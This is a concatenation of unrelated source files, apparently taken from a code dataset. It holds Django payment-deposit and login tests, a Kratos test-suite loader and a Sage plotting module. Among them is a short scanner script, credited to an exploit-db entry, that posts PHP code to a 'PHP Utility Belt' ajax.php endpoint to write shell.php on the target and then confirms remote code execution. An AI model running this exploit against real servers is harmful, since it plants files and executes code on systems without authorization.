)
assert response.status_code == 302
assert client.session["authenticated"] is False
deposit.refresh_from_db()
assert deposit.status == Transaction.STATUS.pending_anchor
@pytest.mark.django_db
def test_interactive_deposit_bad_post_data(client):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
deposit_max_amount=10000,
)
deposit = Transaction.objects.create(
asset=usd,
kind=Transaction.KIND.deposit,
protocol=Transaction.PROTOCOL.sep24,
)
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}",
{"amount": 20000},
)
assert response.status_code == 400
@pytest.mark.django_db
def test_interactive_auth_new_transaction(client, acc1_usd_deposit_transaction_factory):
"""
Tests that requests by previously authenticated accounts are denied if they
were not authenticated for the specified transaction.
"""
deposit = acc1_usd_deposit_transaction_factory()
# So that form_for_transaction() returns TransactionForm
deposit.amount_in = None
deposit.save()
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
new_deposit = acc1_usd_deposit_transaction_factory()
response = client.get(
f"{WEBAPP_PATH}"
f"?transaction_id={new_deposit.id}"
f"&asset_code={new_deposit.asset.code}"
)
assert response.status_code == 403
@pytest.mark.django_db
@patch("polaris.sep24.deposit.rdi.form_for_transaction")
@patch("polaris.sep24.deposit.rdi.content_for_template")
def test_interactive_deposit_get_no_content_tx_incomplete(
mock_content_for_transaction, mock_form_for_transaction, client
):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
deposit = Transaction.objects.create(
asset=usd, kind=Transaction.KIND.deposit, status=Transaction.STATUS.incomplete
)
mock_form_for_transaction.return_value = None
mock_content_for_transaction.return_value = None
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={usd.code}"
)
assert response.status_code == 500
# Django does not save session changes on 500 errors
assert not client.session.get("authenticated")
assert "The anchor did not provide content, unable to serve page." in str(
response.content
)
@pytest.mark.django_db
@patch("polaris.sep24.deposit.rdi.form_for_transaction")
@patch("polaris.sep24.deposit.rdi.content_for_template")
def test_interactive_deposit_get_no_content_tx_complete(
mock_content_for_transaction, mock_form_for_transaction, client
):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
deposit = Transaction.objects.create(
asset=usd, kind=Transaction.KIND.deposit, status=Transaction.STATUS.completed
)
mock_form_for_transaction.return_value = None
mock_content_for_transaction.return_value = None
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={usd.code}"
)
assert response.status_code == 422
assert client.session["authenticated"] is True
assert (
"The anchor did not provide content, is the interactive flow already complete?"
in str(response.content)
)
@pytest.mark.django_db
@patch("polaris.sep24.deposit.rdi.form_for_transaction")
@patch("polaris.sep24.deposit.rdi.content_for_template")
def test_interactive_deposit_post_no_content_tx_incomplete(
mock_content_for_template, mock_form_for_transaction, client
):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
deposit = Transaction.objects.create(
asset=usd, kind=Transaction.KIND.deposit, status=Transaction.STATUS.incomplete
)
mock_form_for_transaction.return_value = None
mock_content_for_template.return_value = {"test": "value"}
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={usd.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={usd.code}"
)
assert response.status_code == 500
assert "The anchor did not provide form content, unable to serve page." in str(
response.content
)
@pytest.mark.django_db
@patch("polaris.sep24.deposit.rdi.form_for_transaction")
@patch("polaris.sep24.deposit.rdi.content_for_template")
def test_interactive_deposit_post_no_content_tx_complete(
mock_content_for_template, mock_form_for_transaction, client
):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
deposit = Transaction.objects.create(
asset=usd, kind=Transaction.KIND.deposit, status=Transaction.STATUS.completed
)
mock_form_for_transaction.return_value = None
mock_content_for_template.return_value = {"test": "value"}
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={usd.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 422
assert (
"The anchor did not provide content, is the interactive flow already complete?"
in str(response.content)
)
@pytest.mark.django_db
@patch("polaris.sep24.deposit.rdi.content_for_template")
def test_interactive_deposit_post_validation_is_called_before_next_form(
mock_content_for_template, client
):
"""
Ensures we call DepositIntegration.after_form_validation() for the posted form data
before we call DepositIntegration.form_for_transaction() to retrieve the next form
"""
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
deposit = Transaction.objects.create(
asset=usd, kind=Transaction.KIND.deposit, status=Transaction.STATUS.incomplete
)
mock_content_for_template.return_value = {"test": "value"}
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
returned_bound_form = False
validated = False
def mock_after_form_validation(*args, **kwargs):
nonlocal validated
validated = True
def mock_form_for_transaction(*args, **kwargs):
nonlocal returned_bound_form
if kwargs.get("post_data"):
returned_bound_form = True
return TransactionForm(kwargs.get("transaction"), kwargs.get("post_data"))
else:
if returned_bound_form and not validated:
raise RuntimeError()
return TransactionForm(kwargs.get("transaction"))
with patch(
"polaris.sep24.deposit.rdi.form_for_transaction", mock_form_for_transaction
):
with patch(
"polaris.sep24.deposit.rdi.after_form_validation",
mock_after_form_validation,
):
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={usd.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}",
{"amount": 100},
)
assert response.status_code == 302
@pytest.mark.django_db()
@patch("polaris.sep24.deposit.rdi.interactive_url")
def test_deposit_interactive_complete(mock_interactive_url, client):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
deposit = Transaction.objects.create(
asset=usd, status=Transaction.STATUS.incomplete
)
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
mock_interactive_url.return_value = "https://test.com/customFlow"
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 302
mock_interactive_url.assert_called_once()
assert client.session["authenticated"] is True
response = client.get(
DEPOSIT_PATH + "/complete",
{"transaction_id": deposit.id, "callback": "test.com/callback"},
)
assert response.status_code == 302
redirect_to_url = response.get("Location")
assert "more_info" in redirect_to_url
assert "callback=test.com%2Fcallback" in redirect_to_url
deposit.refresh_from_db()
assert deposit.status == Transaction.STATUS.pending_user_transfer_start
@pytest.mark.django_db()
@patch("polaris.sep24.deposit.rdi.interactive_url")
def test_deposit_interactive_complete_not_found(mock_interactive_url, client):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
deposit = Transaction.objects.create(
asset=usd, status=Transaction.STATUS.incomplete
)
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
mock_interactive_url.return_value = "https://test.com/customFlow"
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 302
mock_interactive_url.assert_called_once()
assert client.session["authenticated"] is True
response = client.get(
DEPOSIT_PATH + "/complete",
{"transaction_id": "bad id", "callback": "test.com/callback"},
)
assert response.status_code == 403
deposit.refresh_from_db()
assert deposit.status == Transaction.STATUS.incomplete
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success_client_domain)
def test_deposit_client_domain_saved(client):
kp = Keypair.random()
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
response = client.post(
DEPOSIT_PATH,
{"asset_code": usd.code, "account": kp.public_key},
)
content = response.json()
assert response.status_code == 200, json.dumps(content, indent=2)
assert Transaction.objects.count() == 1
transaction = Transaction.objects.first()
assert transaction.client_domain == "test.com"
| StarcoderdataPython |
4827564 | <filename>src/tests/functional/orga/test_auth.py
import pytest
from django.urls import reverse
@pytest.mark.django_db
def test_orga_successful_login(client, user, template_patch):
user.set_password('<PASSWORD>')
user.save()
response = client.post(reverse('orga:login'), data={'username': user.nick, 'password': '<PASSWORD>'}, follow=True)
assert response.status_code == 200
@pytest.mark.django_db
def test_orga_redirect_login(client, orga_user, event):
queryparams = 'foo=bar&something=else'
request_url = event.orga_urls.base + '/?' + queryparams
response = client.get(request_url, follow=True)
assert response.status_code == 200
assert response.redirect_chain[-1] == (f'/orga/login/?next={event.orga_urls.base}/&{queryparams}', 302)
response = client.post(response.redirect_chain[-1][0], data={'username': orga_user.nick, 'password': '<PASSWORD>'}, follow=True)
assert response.status_code == 200
assert event.name in response.content.decode()
assert response.redirect_chain[-1][0] == request_url
@pytest.mark.django_db
def test_orga_accept_invitation_once(client, event, invitation):
assert invitation.user is None
response = client.post(
reverse('orga:invitation.view', kwargs={'code': invitation.invitation_token}),
{
'register_username': 'newuser',
'register_email': invitation.invitation_email,
'register_password': '<PASSWORD>!',
'register_password_repeat': '<PASSWORD>!',
},
follow=True,
)
assert response.status_code == 200
invitation.refresh_from_db()
assert invitation.user.nick == 'newuser'
response = client.get(
reverse('orga:invitation.view', kwargs={'code': invitation.invitation_token}),
follow=True
)
assert response.status_code == 404
response = client.post(
reverse('orga:invitation.view', kwargs={'code': invitation.invitation_token}),
{
'register_username': 'evilnewuser',
'register_email': invitation.invitation_email + '.evil',
'register_password': '<PASSWORD>!',
'register_password_repeat': '<PASSWORD>!',
},
follow=True,
)
assert response.status_code == 404
invitation.refresh_from_db()
assert invitation.user.nick == 'newuser'
@pytest.mark.django_db
def test_orga_incorrect_invite_token(client, event, invitation):
assert invitation.user is None
response = client.get(
reverse('orga:invitation.view', kwargs={'code': invitation.invitation_token + 'WRONG'}),
follow=True
)
assert response.status_code == 404
| StarcoderdataPython |
8038332 | # import Kratos
from KratosMultiphysics import *
from KratosMultiphysics.FSIApplication import *
# Import Kratos "wrapper" for unittests
import KratosMultiphysics.KratosUnittest as KratosUnittest
# Import the tests o test_classes to create the suits
## SMALL TESTS
from convergence_accelerator_test import ConvergenceAcceleratorTest
from convergence_accelerator_spring_test import ConvergenceAcceleratorSpringTest
from FSI_problem_emulator_test import FSIProblemEmulatorTest
from non_conformant_one_side_map_test import NonConformantOneSideMapTest
## NIGTHLY TESTS
## VALIDATION TESTS
from mok_benchmark_test import MokBenchmarkTest
def AssembleTestSuites():
''' Populates the test suites to run.
Populates the test suites to run. At least, it should populate the suites:
"small", "nighlty" and "all"
Return
------
suites: A dictionary of suites
The set of suites with its test_cases added.
'''
suites = KratosUnittest.KratosSuites
# Create a test suit with the selected tests (Small tests):
smallSuite = suites['small']
smallSuite.addTest(ConvergenceAcceleratorTest('test_aitken_accelerator'))
smallSuite.addTest(ConvergenceAcceleratorTest('test_mvqn_accelerator'))
smallSuite.addTest(ConvergenceAcceleratorTest('test_mvqn_recusive_accelerator'))
smallSuite.addTest(ConvergenceAcceleratorTest('test_accelerator_with_jacobian'))
smallSuite.addTest(FSIProblemEmulatorTest('testFSIProblemEmulatorWithAitken'))
smallSuite.addTest(FSIProblemEmulatorTest('testFSIProblemEmulatorWithMVQN'))
smallSuite.addTest(FSIProblemEmulatorTest('testFSIProblemEmulatorWithMVQNRecursive'))
smallSuite.addTest(ConvergenceAcceleratorSpringTest('test_aitken_accelerator_constant_forces'))
smallSuite.addTest(ConvergenceAcceleratorSpringTest('test_aitken_accelerator_variable_stiffness'))
smallSuite.addTest(ConvergenceAcceleratorSpringTest('test_mvqn_recursive_accelerator_constant_forces'))
smallSuite.addTest(ConvergenceAcceleratorSpringTest('test_mvqn_recursive_accelerator_variable_stiffness'))
smallSuite.addTest(NonConformantOneSideMapTest('test2D_1'))
smallSuite.addTest(NonConformantOneSideMapTest('test2D_2'))
smallSuite.addTest(NonConformantOneSideMapTest('test3D_1'))
smallSuite.addTest(NonConformantOneSideMapTest('test3D_two_faces'))
# Create a test suit with the selected tests plus all small tests
nightSuite = suites['nightly']
nightSuite.addTests(smallSuite)
# For very long tests that should not be in nighly and you can use to validate
validationSuite = suites['validation']
validationSuite.addTest(MokBenchmarkTest('testMokBenchmark'))
# Create a test suit that contains all the tests
allSuite = suites['all']
allSuite.addTests(nightSuite)
return suites
if __name__ == '__main__':
KratosUnittest.runTests(AssembleTestSuites())
| StarcoderdataPython |
6424075 | <gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Refer___ : https://www.exploit-db.com/exploits/38901/
import re
def assign(service, arg):
if service == "php_utility_belt":
return True, arg
def audit(arg):
url = arg+'ajax.php'
POST_Data = "code=fwrite(fopen('shell.php','w'),'<?php echo md5(123);?>');"
curl.curl('-d "%s" "%s"' % (POST_Data,url))
shellurl=arg+'shell.php'
code, head, res, errcode, _ = curl.curl(shellurl)
if code==200 and '202cb962ac59075b964b07152d234b70' in res:
security_info('PHP Utility Belt - Remote Code Execution')
if __name__ == '__main__':
from dummy import *
audit(assign('php_utility_belt','http://127.0.0.1:8080/php-utility-belt/')[1]) | StarcoderdataPython |
12807624 | <reponame>UCD4IDS/sage
"Plotting utilities"
# ****************************************************************************
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# https://www.gnu.org/licenses/
# ****************************************************************************
from sage.ext.fast_callable import FastCallableFloatWrapper
from collections.abc import Iterable
def setup_for_eval_on_grid(funcs,
ranges,
plot_points=None,
return_vars=False,
imaginary_tolerance=1e-8):
r"""
Calculate the necessary parameters to construct a list of points,
and make the functions fast_callable.
INPUT:
- ``funcs`` -- a function, or a list, tuple, or vector of functions
- ``ranges`` -- a list of ranges. A range can be a 2-tuple of
numbers specifying the minimum and maximum, or a 3-tuple giving
the variable explicitly.
- ``plot_points`` -- a tuple of integers specifying the number of
plot points for each range. If a single number is specified, it
will be the value for all ranges. This defaults to 2.
- ``return_vars`` -- (default ``False``) If ``True``, return the variables,
in order.
- ``imaginary_tolerance`` -- (default: ``1e-8``); if an imaginary
number arises (due, for example, to numerical issues), this
tolerance specifies how large it has to be in magnitude before
we raise an error. In other words, imaginary parts smaller than
this are ignored in your plot points.
OUTPUT:
- ``fast_funcs`` - if only one function passed, then a fast
callable function. If funcs is a list or tuple, then a tuple
of fast callable functions is returned.
- ``range_specs`` - a list of range_specs: for each range, a
tuple is returned of the form (range_min, range_max,
range_step) such that ``srange(range_min, range_max,
range_step, include_endpoint=True)`` gives the correct points
for evaluation.
EXAMPLES::
sage: x,y,z=var('x,y,z')
sage: f(x,y)=x+y-z
sage: g(x,y)=x+y
sage: h(y)=-y
sage: sage.plot.misc.setup_for_eval_on_grid(f, [(0, 2),(1,3),(-4,1)], plot_points=5)
(<sage...>, [(0.0, 2.0, 0.5), (1.0, 3.0, 0.5), (-4.0, 1.0, 1.25)])
sage: sage.plot.misc.setup_for_eval_on_grid([g,h], [(0, 2),(-1,1)], plot_points=5)
((<sage...>, <sage...>), [(0.0, 2.0, 0.5), (-1.0, 1.0, 0.5)])
sage: sage.plot.misc.setup_for_eval_on_grid([sin,cos], [(-1,1)], plot_points=9)
((<sage...>, <sage...>), [(-1.0, 1.0, 0.25)])
sage: sage.plot.misc.setup_for_eval_on_grid([lambda x: x^2,cos], [(-1,1)], plot_points=9)
((<function <lambda> ...>, <sage...>), [(-1.0, 1.0, 0.25)])
sage: sage.plot.misc.setup_for_eval_on_grid([x+y], [(x,-1,1),(y,-2,2)])
((<sage...>,), [(-1.0, 1.0, 2.0), (-2.0, 2.0, 4.0)])
sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(x,-1,1),(y,-1,1)], plot_points=[4,9])
(<sage...>, [(-1.0, 1.0, 0.6666666666666666), (-1.0, 1.0, 0.25)])
sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(x,-1,1),(y,-1,1)], plot_points=[4,9,10])
Traceback (most recent call last):
...
ValueError: plot_points must be either an integer or a list of integers, one for each range
sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(1,-1),(y,-1,1)], plot_points=[4,9,10])
Traceback (most recent call last):
...
ValueError: Some variable ranges specify variables while others do not
Beware typos: a comma which should be a period, for instance::
sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(x, 1, 2), (y, 0,1, 0.2)], plot_points=[4,9,10])
Traceback (most recent call last):
...
ValueError: At least one variable range has more than 3 entries: each should either have 2 or 3 entries, with one of the forms (xmin, xmax) or (x, xmin, xmax)
sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(y,1,-1),(x,-1,1)], plot_points=5)
(<sage...>, [(1.0, -1.0, 0.5), (-1.0, 1.0, 0.5)])
sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(x,1,-1),(x,-1,1)], plot_points=5)
Traceback (most recent call last):
...
ValueError: range variables should be distinct, but there are duplicates
sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(x,1,1),(y,-1,1)])
Traceback (most recent call last):
...
ValueError: plot start point and end point must be different
sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(x,1,-1),(y,-1,1)], return_vars=True)
(<sage...>, [(1.0, -1.0, 2.0), (-1.0, 1.0, 2.0)], [x, y])
sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(y,1,-1),(x,-1,1)], return_vars=True)
(<sage...>, [(1.0, -1.0, 2.0), (-1.0, 1.0, 2.0)], [y, x])
TESTS:
Ensure that we can plot expressions with intermediate complex
terms as in :trac:`8450`::
sage: x, y = SR.var('x y')
sage: contour_plot(abs(x+i*y), (x,-1,1), (y,-1,1))
Graphics object consisting of 1 graphics primitive
sage: density_plot(abs(x+i*y), (x,-1,1), (y,-1,1))
Graphics object consisting of 1 graphics primitive
sage: plot3d(abs(x+i*y), (x,-1,1),(y,-1,1))
Graphics3d Object
sage: streamline_plot(abs(x+i*y), (x,-1,1),(y,-1,1))
Graphics object consisting of 1 graphics primitive
"""
if max(map(len, ranges)) > 3:
raise ValueError("At least one variable range has more than 3 entries: each should either have 2 or 3 entries, with one of the forms (xmin, xmax) or (x, xmin, xmax)")
if max(map(len, ranges)) != min(map(len, ranges)):
raise ValueError("Some variable ranges specify variables while others do not")
if len(ranges[0]) == 3:
vars = [r[0] for r in ranges]
ranges = [r[1:] for r in ranges]
if len(set(vars)) < len(vars):
raise ValueError("range variables should be distinct, but there are duplicates")
else:
vars, free_vars = unify_arguments(funcs)
# pad the variables if we don't have enough
nargs = len(ranges)
if len(vars) < nargs:
vars += ('_',)*(nargs-len(vars))
ranges = [[float(z) for z in r] for r in ranges]
if plot_points is None:
plot_points = 2
if not isinstance(plot_points, (list, tuple)):
plot_points = [plot_points]*len(ranges)
elif len(plot_points) != nargs:
raise ValueError("plot_points must be either an integer or a list of integers, one for each range")
plot_points = [int(p) if p >= 2 else 2 for p in plot_points]
range_steps = [abs(range[1] - range[0])/(p-1) for range, p in zip(ranges, plot_points)]
if min(range_steps) == float(0):
raise ValueError("plot start point and end point must be different")
eov = False # eov = "expect one value"
if nargs == 1:
eov = True
from sage.ext.fast_callable import fast_callable
def try_make_fast(f):
# If "f" supports fast_callable(), use it. We can't guarantee
# that our arguments will actually support fast_callable()
# because, for example, the user may already have done it
# himself, and the result of fast_callable() can't be
# fast-callabled again.
from sage.rings.complex_double import CDF
from sage.ext.interpreters.wrapper_cdf import Wrapper_cdf
if hasattr(f, '_fast_callable_'):
ff = fast_callable(f, vars=vars, expect_one_var=eov, domain=CDF)
return FastCallablePlotWrapper(ff, imag_tol=imaginary_tolerance)
elif isinstance(f, Wrapper_cdf):
# Already a fast-callable, just wrap it. This can happen
# if, for example, a symolic expression is passed to a
# higher-level plot() function that converts it to a
# fast-callable with expr._plot_fast_callable() before
# we ever see it.
return FastCallablePlotWrapper(f, imag_tol=imaginary_tolerance)
elif callable(f):
# This will catch python functions, among other things. We don't
# wrap these yet because we don't know what type they'll return.
return f
else:
# Convert things like ZZ(0) into constant functions.
from sage.symbolic.ring import SR
ff = fast_callable(SR(f),
vars=vars,
expect_one_var=eov,
domain=CDF)
return FastCallablePlotWrapper(ff, imag_tol=imaginary_tolerance)
# Handle vectors, lists, tuples, etc.
if isinstance(funcs, Iterable):
funcs = tuple( try_make_fast(f) for f in funcs )
else:
funcs = try_make_fast(funcs)
#TODO: raise an error if there is a function/method in funcs that takes more values than we have ranges
if return_vars:
return (funcs,
[tuple(_range + [range_step])
for _range, range_step in zip(ranges, range_steps)],
vars)
else:
return (funcs,
[tuple(_range + [range_step])
for _range, range_step in zip(ranges, range_steps)])
def unify_arguments(funcs):
"""
Return a tuple of variables of the functions, as well as the
number of "free" variables (i.e., variables that defined in a
callable function).
INPUT:
- ``funcs`` -- a list of functions; these can be symbolic
expressions, polynomials, etc
OUTPUT: functions, expected arguments
- A tuple of variables in the functions
- A tuple of variables that were "free" in the functions
EXAMPLES::
sage: x,y,z=var('x,y,z')
sage: f(x,y)=x+y-z
sage: g(x,y)=x+y
sage: h(y)=-y
sage: sage.plot.misc.unify_arguments((f,g,h))
((x, y, z), (z,))
sage: sage.plot.misc.unify_arguments((g,h))
((x, y), ())
sage: sage.plot.misc.unify_arguments((f,z))
((x, y, z), (z,))
sage: sage.plot.misc.unify_arguments((h,z))
((y, z), (z,))
sage: sage.plot.misc.unify_arguments((x+y,x-y))
((x, y), (x, y))
"""
vars=set()
free_variables=set()
if not isinstance(funcs, (list, tuple)):
funcs = [funcs]
from sage.structure.element import Expression
for f in funcs:
if isinstance(f, Expression) and f.is_callable():
f_args = set(f.arguments())
vars.update(f_args)
else:
f_args = set()
try:
free_vars = set(f.variables()).difference(f_args)
vars.update(free_vars)
free_variables.update(free_vars)
except AttributeError:
# we probably have a constant
pass
return tuple(sorted(vars, key=str)), tuple(sorted(free_variables, key=str))
def _multiple_of_constant(n, pos, const):
r"""
Function for internal use in formatting ticks on axes with
nice-looking multiples of various symbolic constants, such
as `\pi` or `e`. Should only be used via keyword argument
`tick_formatter` in :meth:`plot.show`. See documentation
for the matplotlib.ticker module for more details.
EXAMPLES:
Here is the intended use::
sage: plot(sin(x), (x,0,2*pi), ticks=pi/3, tick_formatter=pi)
Graphics object consisting of 1 graphics primitive
Here is an unintended use, which yields unexpected (and probably
undesired) results::
sage: plot(x^2, (x, -2, 2), tick_formatter=pi)
Graphics object consisting of 1 graphics primitive
We can also use more unusual constant choices::
sage: plot(ln(x), (x,0,10), ticks=e, tick_formatter=e)
Graphics object consisting of 1 graphics primitive
sage: plot(x^2, (x,0,10), ticks=[sqrt(2),8], tick_formatter=sqrt(2))
Graphics object consisting of 1 graphics primitive
"""
from sage.misc.latex import latex
from sage.rings.continued_fraction import continued_fraction
from sage.rings.infinity import Infinity
cf = continued_fraction(n/const)
k = 1
while cf.quotient(k) != Infinity and cf.denominator(k) < 12:
k += 1
return '$%s$'%latex(cf.convergent(k-1)*const)
def get_matplotlib_linestyle(linestyle, return_type):
"""
Function which translates between matplotlib linestyle in short notation
(i.e. '-', '--', ':', '-.') and long notation (i.e. 'solid', 'dashed',
'dotted', 'dashdot' ).
If linestyle is none of these allowed options, the function raises
a ValueError.
INPUT:
- ``linestyle`` - The style of the line, which is one of
- ``"-"`` or ``"solid"``
- ``"--"`` or ``"dashed"``
- ``"-."`` or ``"dash dot"``
- ``":"`` or ``"dotted"``
- ``"None"`` or ``" "`` or ``""`` (nothing)
The linestyle can also be prefixed with a drawing style (e.g., ``"steps--"``)
- ``"default"`` (connect the points with straight lines)
- ``"steps"`` or ``"steps-pre"`` (step function; horizontal
line is to the left of point)
- ``"steps-mid"`` (step function; points are in the middle of
horizontal lines)
- ``"steps-post"`` (step function; horizontal line is to the
right of point)
If ``linestyle`` is ``None`` (of type NoneType), then we return it
back unmodified.
- ``return_type`` - The type of linestyle that should be output. This
argument takes only two values - ``"long"`` or ``"short"``.
EXAMPLES:
Here is an example how to call this function::
sage: from sage.plot.misc import get_matplotlib_linestyle
sage: get_matplotlib_linestyle(':', return_type='short')
':'
sage: get_matplotlib_linestyle(':', return_type='long')
'dotted'
TESTS:
Make sure that if the input is already in the desired format, then it
is unchanged::
sage: get_matplotlib_linestyle(':', 'short')
':'
Empty linestyles should be handled properly::
sage: get_matplotlib_linestyle("", 'short')
''
sage: get_matplotlib_linestyle("", 'long')
'None'
sage: get_matplotlib_linestyle(None, 'short') is None
True
Linestyles with ``"default"`` or ``"steps"`` in them should also be
properly handled. For instance, matplotlib understands only the short
version when ``"steps"`` is used::
sage: get_matplotlib_linestyle("default", "short")
''
sage: get_matplotlib_linestyle("steps--", "short")
'steps--'
sage: get_matplotlib_linestyle("steps-predashed", "long")
'steps-pre--'
Finally, raise error on invalid linestyles::
sage: get_matplotlib_linestyle("isthissage", "long")
Traceback (most recent call last):
...
ValueError: WARNING: Unrecognized linestyle 'isthissage'. Possible
linestyle options are:
{'solid', 'dashed', 'dotted', dashdot', 'None'}, respectively {'-',
'--', ':', '-.', ''}
"""
long_to_short_dict={'solid' : '-','dashed' : '--', 'dotted' : ':',
'dashdot':'-.'}
short_to_long_dict={'-' : 'solid','--' : 'dashed', ':' : 'dotted',
'-.':'dashdot'}
# We need this to take care of region plot. Essentially, if None is
# passed, then we just return back the same thing.
if linestyle is None:
return None
if linestyle.startswith("default"):
return get_matplotlib_linestyle(linestyle.strip("default"), "short")
elif linestyle.startswith("steps"):
if linestyle.startswith("steps-mid"):
return "steps-mid" + get_matplotlib_linestyle(
linestyle.strip("steps-mid"), "short")
elif linestyle.startswith("steps-post"):
return "steps-post" + get_matplotlib_linestyle(
linestyle.strip("steps-post"), "short")
elif linestyle.startswith("steps-pre"):
return "steps-pre" + get_matplotlib_linestyle(
linestyle.strip("steps-pre"), "short")
else:
return "steps" + get_matplotlib_linestyle(
linestyle.strip("steps"), "short")
if return_type == 'short':
if linestyle in short_to_long_dict.keys():
return linestyle
elif linestyle == "" or linestyle == " " or linestyle == "None":
return ''
elif linestyle in long_to_short_dict.keys():
return long_to_short_dict[linestyle]
else:
raise ValueError("WARNING: Unrecognized linestyle '%s'. "
"Possible linestyle options are:\n{'solid', "
"'dashed', 'dotted', dashdot', 'None'}, "
"respectively {'-', '--', ':', '-.', ''}"%
(linestyle))
elif return_type == 'long':
if linestyle in long_to_short_dict.keys():
return linestyle
elif linestyle == "" or linestyle == " " or linestyle == "None":
return "None"
elif linestyle in short_to_long_dict.keys():
return short_to_long_dict[linestyle]
else:
raise ValueError("WARNING: Unrecognized linestyle '%s'. "
"Possible linestyle options are:\n{'solid', "
"'dashed', 'dotted', dashdot', 'None'}, "
"respectively {'-', '--', ':', '-.', ''}"%
(linestyle))
class FastCallablePlotWrapper(FastCallableFloatWrapper):
r"""
A fast-callable wrapper for plotting that returns ``nan`` instead
of raising an error whenever the imaginary tolerance is exceeded.
A detailed rationale for this can be found in the superclass
documentation.
EXAMPLES:
The ``float`` incarnation of "not a number" is returned instead
of an error being thrown if the answer is complex::
sage: from sage.plot.misc import FastCallablePlotWrapper
sage: f = sqrt(x)
sage: ff = fast_callable(f, vars=[x], domain=CDF)
sage: fff = FastCallablePlotWrapper(ff, imag_tol=1e-8)
sage: fff(1)
1.0
sage: fff(-1)
nan
"""
def __call__(self, *args):
r"""
Evaluate the underlying fast-callable and convert the result to
``float``.
TESTS:
Evaluation never fails and always returns a ``float``::
sage: from sage.plot.misc import FastCallablePlotWrapper
sage: f = x
sage: ff = fast_callable(f, vars=[x], domain=CDF)
sage: fff = FastCallablePlotWrapper(ff, imag_tol=0.1)
sage: type(fff(CDF.random_element())) is float
True
"""
try:
return super().__call__(*args)
except ValueError:
return float("nan")
| StarcoderdataPython |
171280 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from signbank.settings.base import *
